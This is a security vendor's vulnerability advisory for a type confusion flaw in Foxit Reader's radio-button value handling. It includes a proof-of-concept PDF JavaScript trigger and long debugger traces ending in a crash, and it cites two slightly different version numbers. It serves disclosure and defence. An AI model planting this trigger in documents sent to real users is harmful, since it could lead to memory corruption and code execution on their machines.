Talos Vulnerability Report

TALOS-2023-1838

Foxit Reader field value property type confusion vulnerability

November 27, 2023
CVE Number

CVE-2023-41257

SUMMARY

A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a type confusion vulnerability in the way Foxit Reader handles the value property of the Radio Button field. This can be illustrated by the following proof-of-concept code:

function main() {
    app.activeDocs[0].getField('Text Field1')['display'];
    app.activeDocs[0].deletePages();
    // Attach a Calculate action to field txt5; it fires when another field's value changes.
    getField('txt5').setAction("Calculate", 'delete_pages();');
    // Setting the Radio Button value triggers the Calculate action above.
    app.activeDocs[0].getField('Radio Button0')['value'] = 'a';
}

function delete_pages() {
    app.activeDocs[0].deletePages();
}

The above code simply assigns a callback function to the Calculate action of the field txt5, which is promptly triggered when the value property of Radio Button0 is set. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing a large number of objects. It also resets the Radio Button object and assigns it to a different object. The exact cause of this behaviour is unknown. Later on, when the Radio Button object is used without its type validation, a type confusion vulnerability occurs. We can observe the following in the debugger (with PageHeap enabled):

0:002> p
Time Travel Position: D46CA:1D56
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b1 esp=072fee4c ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f051:
0258c7b1 ff37            push    dword ptr [edi]      ds:002b:072fef18=47418ff8
0:002> p
Time Travel Position: D46CA:1D57
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b3 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f053:
0258c7b3 8bce            mov     ecx,esi
0:002> p
Time Travel Position: D46CA:1D58
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b5 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f055:
0258c7b5 c645fc08        mov     byte ptr [ebp-4],8         ss:002b:072feed4=00
0:002> dd esi                                             ; <-------------------------------------- [1]
37193830  00000002 00000000 22af8800 37193710
37193840  00000000 22b04918 00000001 00000001
37193850  00000000 00000004 00000000 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> ba w4 37193830                                      ; <-------------------------------------- [2]
0:002> p
Time Travel Position: D46CA:1D59
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b9 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff      call    FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0) ; <---------------- [3]
0:002> u
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff      call    FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0)
0258c7be 8b5de8          mov     ebx,dword ptr [ebp-18h]
0258c7c1 85db            test    ebx,ebx
0258c7c3 7456            je      FoxitPDFReader!safe_vsnprintf+0xf8f0bb (0258c81b)
0258c7c5 c7458800000000  mov     dword ptr [ebp-78h],0
0258c7cc c7458c00000000  mov     dword ptr [ebp-74h],0
0258c7d3 c7459000000000  mov     dword ptr [ebp-70h],0
0258c7da 8d45e0          lea     eax,[ebp-20h]
0:002> bp 0258c7be                                           
0:002> p
Breakpoint 3 hit
Time Travel Position: D4E44:C2
eax=00003801 ebx=072fe1dc ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe0e8 ebp=072fe0f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06            mov     eax,dword ptr [esi]  ds:002b:37193000=00000053

0:002> dd 37193830
37193830  371936e0 00000000 22af8800 37193710
37193840  00000000 22b04918 00000000 00000001
37193850  00000000 00000004 00000000 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> ba w4 3719383c                                           ; <-------------------------------------- [4]
0:002> g
Breakpoint 3 hit
Time Travel Position: D4E45:C05
eax=37193830 ebx=072fe14c ecx=00000000 edx=00000005 esi=00000010 edi=0000000c
eip=01b27f90 esp=072fe08c ebp=072fe094 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52a830:
01b27f90 66894c780c      mov     word ptr [eax+edi*2+0Ch],cx ds:002b:37193854=0004

[...] 

0:002> g
Breakpoint 6 hit
Time Travel Position: D5347:FC7
eax=0000001f ebx=04614a58 ecx=00000007 edx=62626952 esi=04614a58 edi=3719383c
eip=03eef09b esp=072fe39c ebp=072fe3c0 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d76b:
03eef09b 83c704          add     edi,4
0:002> dd 37193830
37193830  00000001 0000001f 0000001f 62626952
37193840  006e0067 00740061 00720075 005f0065
37193850  002e0031 00000000 00000000 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1BB7
eax=37193830 ebx=00000000 ecx=072fe3d0 edx=37193850 esi=00000000 edi=15faafe4
eip=01b29758 esp=072fe39c ebp=072fe3c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52bff8:
01b29758 8b01            mov     eax,dword ptr [ecx]  ds:002b:072fe3d0=37193830
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1C33
eax=00003801 ebx=00000000 ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe328 ebp=072fe330 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06            mov     eax,dword ptr [esi]  ds:002b:37193000=00000053
0:002> g
Breakpoint 4 hit
Time Travel Position: D5354:6E8
eax=ffffffff ebx=00000001 ecx=a8eb98f8 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7be esp=072fee50 ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f05e:
0258c7be 8b5de8          mov     ebx,dword ptr [ebp-18h] ss:002b:072feec0=14e46fa8
0:002> dd 37193830                                                       ; <-------------------------------------- [5]
37193830  371936e0 0000001f 0000001f 62626952
37193840  435f6e6f 67657461 5f79726f 74736f50
37193850  6e616353 6974704f 00736e6f 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> da 37193830+c 
3719383c  "Ribbon_Category_PostScanOptions"

0:002> pc
Time Travel Position: D5354:6F2
eax=072feeb8 ebx=14e46fa8 ecx=072fee60 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7e5 esp=072fee4c ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f085:
0258c7e5 e82678feff      call    FoxitPDFReader!safe_vsnprintf+0xf768b0 (02574010)
0:002> pc
Time Travel Position: D5358:1008
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=0258c7f0 esp=072fee4c ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f090:
0258c7f0 e89bc93bff      call    FoxitPDFReader!safe_vsnprintf+0x34ba30 (01949190)
0:002> t
Time Travel Position: D5358:1009
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949190 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba30:
01949190 55              push    ebp
0:002> p
Time Travel Position: D5358:100A
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949191 esp=072fee44 ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba31:
01949191 8bec            mov     ebp,esp
0:002> p
Time Travel Position: D5358:100B
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949193 esp=072fee44 ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba33:
01949193 ff710c          push    dword ptr [ecx+0Ch]  ds:002b:3719383c=62626952 <-------------------------[6]
0:002> p
Time Travel Position: D5358:100C
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949196 esp=072fee40 ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba36:
01949196 ff7508          push    dword ptr [ebp+8]    ss:002b:072fee4c=072feea4
0:002> p
Time Travel Position: D5358:100D
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949199 esp=072fee3c ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba39:
01949199 e812bdffff      call    FoxitPDFReader!safe_vsnprintf+0x347750 (01944eb0)

0:002> t
Time Travel Position: D5358:100E
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01944eb0 esp=072fee38 ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x347750:
01944eb0 55              push    ebp
0:002> pc
Time Travel Position: D5358:1022
eax=62626952 ebx=14e46fa8 ecx=072fedf0 edx=00000000 esi=37193830 edi=072fef18
eip=01944ef1 esp=072fedd8 ebp=072fee34 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
FoxitPDFReader!safe_vsnprintf+0x347791:
01944ef1 e8ca6a1e00      call    FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:1039
eax=072fedf0 ebx=14e46fa8 ecx=072fee0c edx=00000004 esi=37193830 edi=072fef18
eip=01944f0f esp=072fedd8 ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477af:
01944f0f e8ac6a1e00      call    FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:104C
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01944f1b esp=072fede0 ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477bb:
01944f1b e870b7ffff      call    FoxitPDFReader!safe_vsnprintf+0x342f30 (01940690)
0:002> t
Time Travel Position: D5358:104D
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940690 esp=072feddc ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f30:
01940690 55              push    ebp
0:002> t
Time Travel Position: D5358:104E
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940691 esp=072fedd8 ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f31:
01940691 8bec            mov     ebp,esp
0:002> p
Time Travel Position: D5358:104F
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940693 esp=072fedd8 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f33:
01940693 6aff            push    0FFFFFFFFh
0:002> p
Time Travel Position: D5358:1050
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940695 esp=072fedd4 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f35:
01940695 6829924104      push    offset FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x9678f9 (04419229)
0:002> p
Time Travel Position: D5358:1051
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=0194069a esp=072fedd0 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f3a:
0194069a 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:1052
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a0 esp=072fedd0 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f40:
019406a0 50              push    eax
0:002> p
Time Travel Position: D5358:1053
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a1 esp=072fedcc ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f41:
019406a1 83ec4c          sub     esp,4Ch
0:002> p
Time Travel Position: D5358:1054
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a4 esp=072fed80 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f44:
019406a4 53              push    ebx
0:002> p
Time Travel Position: D5358:1055
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a5 esp=072fed7c ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f45:
019406a5 56              push    esi
0:002> p
Time Travel Position: D5358:1056
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a6 esp=072fed78 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f46:
019406a6 57              push    edi
0:002> p
Time Travel Position: D5358:1057
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a7 esp=072fed74 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f47:
019406a7 a1e4149405      mov     eax,dword ptr [FoxitPDFReader!fLS::FLAGS_log_backtrace_at+0x110180 (059414e4)] ds:002b:059414e4=afc476d4
0:002> p
Time Travel Position: D5358:1058
eax=afc476d4 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ac esp=072fed74 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f4c:
019406ac 33c5            xor     eax,ebp
0:002> p
Time Travel Position: D5358:1059
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ae esp=072fed74 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4e:
019406ae 50              push    eax
0:002> p
Time Travel Position: D5358:105A
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406af esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4f:
019406af 8d45f4          lea     eax,[ebp-0Ch]
0:002> p
Time Travel Position: D5358:105B
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b2 esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f52:
019406b2 64a300000000    mov     dword ptr fs:[00000000h],eax fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:105C
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b8 esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f58:
019406b8 8bd9            mov     ebx,ecx
0:002> p
Time Travel Position: D5358:105D
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ba esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5a:
019406ba 8b33            mov     esi,dword ptr [ebx]  ds:002b:072fede8=62626952 <---------------- [7]
0:002> p
Time Travel Position: D5358:105E
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406bc esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5c:
019406bc 85f6            test    esi,esi
0:002> p
Time Travel Position: D5358:105F
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406be esp=072fed70 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f5e:
019406be 0f84d9010000    je      FoxitPDFReader!safe_vsnprintf+0x34313d (0194089d) [br=0]

At [1], we examine the vulnerable field object. The first 4 bytes of the object indicate the type of the field. The Push Button, Radio Button and Check Box fields are indicated by the values 1, 2 and 3 respectively. Here, the vulnerable field object type is the Radio Button. Two breakpoints are set on the write access at different offsets of the vulnerable pointer at [2] and [4]. These breakpoints were hit multiple times when the function at [3] was called. At [5], it can be observed that the vulnerable object type is different. Later on, the value at the offset 0x0c of the vulnerable object is assigned to the esi register at [6] and [7]. The crash occurs later in the code when the memory pointed to by the esi register is dereferenced. This can be observed in a debugger at the time of the crash:

0:002> g
(11a0.c34): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: D5359:0
eax=00000054 ebx=072fede8 ecx=00000054 edx=00000000 esi=62626962 edi=072fed90
eip=01b366d2 esp=072fed14 ebp=072fed1c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608          div     eax,dword ptr [esi+8] ds:002b:6262696a=????????
0:002> u
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608          div     eax,dword ptr [esi+8]
01b366d5 8b450c          mov     eax,dword ptr [ebp+0Ch]
01b366d8 8910            mov     dword ptr [eax],edx
01b366da 8b7604          mov     esi,dword ptr [esi+4]
01b366dd 85f6            test    esi,esi
01b366df 7422            je      FoxitPDFReader!safe_vsnprintf+0x538fa3 (01b36703)
01b366e1 8b3496          mov     esi,dword ptr [esi+edx*4]
01b366e4 85f6            test    esi,esi
0:002> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fed1c 01b36cd0     072fed90 072fed2c 62626962 FoxitPDFReader!safe_vsnprintf+0x538f72
01 072fed30 01801f2a     072fed90 072fed48 a8eb9b8c FoxitPDFReader!safe_vsnprintf+0x539570
02 072fed58 0194073f     072fedc8 072fed90 00000000 FoxitPDFReader!safe_vsnprintf+0x2047ca
03 072fedd8 01944f20     a8eb98e0 37193830 62626952 FoxitPDFReader!safe_vsnprintf+0x342fdf
04 072fee34 0194919e     072feea4 62626952 072feed8 FoxitPDFReader!safe_vsnprintf+0x3477c0
05 072fee44 0258c7f5     072feea4 a8eb980c 13304f40 FoxitPDFReader!safe_vsnprintf+0x34ba3e
06 072feed8 0257767a     2c256ff8 072fef00 ffffffff FoxitPDFReader!safe_vsnprintf+0xf8f095
07 072fef38 02597097     024b2110 072fef7c 072fef64 FoxitPDFReader!safe_vsnprintf+0xf79f1a
08 072fef6c 0256a8b1     48d6cff8 072fef94 0eebf8e0 FoxitPDFReader!safe_vsnprintf+0xf99937
09 072fefc0 02833022     3ddf4ff8 072fefe4 48d6cff8 FoxitPDFReader!safe_vsnprintf+0xf6d151
0a 072feffc 0289d8b0     072ff488 072ff498 4b8aa600 FoxitPDFReader!FXJSE_GetClass+0x552
0b 072ff064 028b30a4     072ff0cc 3dfb3068 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x6a4a0
0c 072ff118 028b2df4     072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7fc94
0d 072ff15c 028b3696     072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f9e4
0e 072ff268 028b2d84     072ff2d8 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x80286
0f 072ff2b0 028b2acc     072ff2d8 072f0001 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f974
10 072ff2dc 02cfcff2     072ff39c 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f6bc
11 072ff3c0 02cf72b0     072ff44c 072ff48c 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c9be2
12 072ff460 02c38c3b     00000005 072ff498 4b8aa600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c3ea0
13 072ff480 02cb0bea     538856a1 52c3172d 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40582b
14 072ff4bc 02bd4d79     5395209d 539520b9 52c31511 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x47d7da
15 072ff4e8 02bd4d79     538feb6d 53951ec1 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
16 072ff510 02bd3400     538feb6d 538821b1 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
17 072ff528 02bd3229     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fff0
18 072ff554 0286f59e     4b8aa600 53882339 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fe19
19 072ff664 0286f0b2     072ff7f8 4b8aa600 072ff6c0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
1a 072ff6ec 02857da4     072ff7f8 4b8aa600 3dfb3024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bca2
1b 072ff89c 028578a0     072ff938 3dfb3040 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
1c 072ff8b0 028312af     072ff938 3dfb3040 a8eb8ffc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
1d 072ff928 02831be6     3dfb3024 181ecff8 3dfb3010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
1e 072ff964 024af2f4     4d2b0fd8 3ff79c8c 181ecff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1f 072ff9c8 024b01e0     00000000 072ffa40 072ffa0c FoxitPDFReader!safe_vsnprintf+0xeb1b94
20 072ff9dc 02600775     072ffa40 072ffa0c a8eb8cd0 FoxitPDFReader!safe_vsnprintf+0xeb2a80
21 072ffa04 02600879     00000000 072ffa40 a8eb8cec FoxitPDFReader!safe_vsnprintf+0x1003015
22 072ffa38 024b2360     371b7020 00000113 072ffa5c FoxitPDFReader!safe_vsnprintf+0x1003119
23 072ffa48 00bf7e97     00000113 00007ee6 16fc9251 FoxitPDFReader!safe_vsnprintf+0xeb4c00
24 072ffa5c 769223b3     00000000 00000113 00007ee6 FoxitPDFReader!CryptUIWizExport+0x28147
25 072ffa88 7690ca55     00bf7e80 00000000 00000113 USER32!_InternalCallWinProc+0x2b
26 072ffb58 769117b4     00bf7e80 00000000 00000113 USER32!UserCallWinProc+0x143
27 072ffbcc 769115c0     00000113 072ffbf4 0055d3c4 USER32!DispatchMessageWorker+0x1e4
28 072ffbd8 0055d3c4     0f042ec8 0f042ec8 05ae3738 USER32!DispatchMessageW+0x10
29 072ffbf4 0055d483     05ae3738 0055d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
2a 072ffc14 040a021e     00000000 05b0fab4 071fb000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
2b 072ffc2c 03e65f48     00140000 00000000 09cac308 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
2c 072ffc78 75de7d59     071fb000 75de7d40 072ffce0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
2d 072ffc88 771ab79b     071fb000 43a1b297 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 072ffce0 771ab71f     ffffffff 771d89db 00000000 ntdll!__RtlUserThreadStart+0x2b
